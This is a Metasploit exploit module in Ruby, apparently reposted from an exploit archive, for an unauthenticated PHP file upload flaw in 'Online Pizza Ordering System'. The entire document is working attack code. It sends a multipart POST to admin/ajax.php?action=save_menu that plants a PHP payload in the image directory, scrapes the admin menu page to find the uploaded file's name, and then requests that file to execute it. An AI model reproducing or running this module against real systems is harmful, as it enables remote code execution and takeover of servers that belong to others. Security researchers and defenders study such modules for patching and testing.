Share
## https://sploitus.com/exploit?id=PACKETSTORM:174693
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Online Pizza Ordering System PHP File Upload Vulnerability",  
'Description' => %q{  
This module exploits a vulnerability found in Online Pizza Ordering System By abusing the  
admin_class.php file, a malicious user can upload a file to the img/ directory  
without any authentication, which results in arbitrary code execution. The module  
has been tested successfully on Ubuntu 22.04.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Sefa Ozan' # author & msf module  
],  
'References' =>  
[  
['URL', 'https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['Online Pizza Ordering System', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => '2023-09-11',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to Online Pizza Ordering System', '/php-opos'])  
])  
end  
  
def check  
uri = target_uri.path  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "admin", "ajax.php")  
})  
  
if res and res.code == 200  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
uri = normalize_uri(target_uri.path)  
uri << '/' if uri[-1,1] != '/'  
payload_name = rand_text_alpha(rand(10) + 5) + '.php'  
boundary = Rex::Text.rand_text_hex(7)  
  
post_data = "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"id\"\r\n\r\n\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n"  
post_data << "#{boundary}\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"description\"\r\n\r\n"  
post_data << "#{boundary}\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"status\"\r\n\r\n"  
post_data << "on\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"category_id\"\r\n\r\n"  
post_data << "3\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"price\"\r\n\r\n"  
post_data << "1\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"img\"; filename=\"#{payload_name}\"\r\n\r\n\r\n"  
post_data << "<?php "  
post_data << payload.encoded  
post_data << " ?>\r\n"  
post_data << "-----------------------------#{boundary}--\r\n"  
  
print_status("Sending PHP payload (#{payload_name})")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, "admin", "ajax.php?action=save_menu"),  
'ctype' => "multipart/form-data; boundary=---------------------------#{boundary}",  
'data' => post_data  
})  
  
# If the server does not return 200 and the body does not contain 1,  
# we assume we couldn't uploaded the malicious php file.  
if not res or res.code != 200 or !res.body.include?("1")  
print_error("File wasn't uploaded, aborting!")  
return  
end  
  
#Geting our malicious php file's exact name on the server.  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "admin", "index.php?page=menu")  
})  
  
# Trying to find our malicious file's name on the server with this ugly regex.  
if res and res.body.include?("#{payload_name}")  
match = res.body.match('data\-name="' + boundary + '" data\-status="1" data\-description="' + boundary + '" data\-price="1" data\-category_id="3" data\-img_path="(.*?' + payload_name + ')">Edit<')[1]  
end  
  
print_status("Executing PHP payload")  
# Executing our payload  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "assets", "img", "#{match}")  
})  
end  
end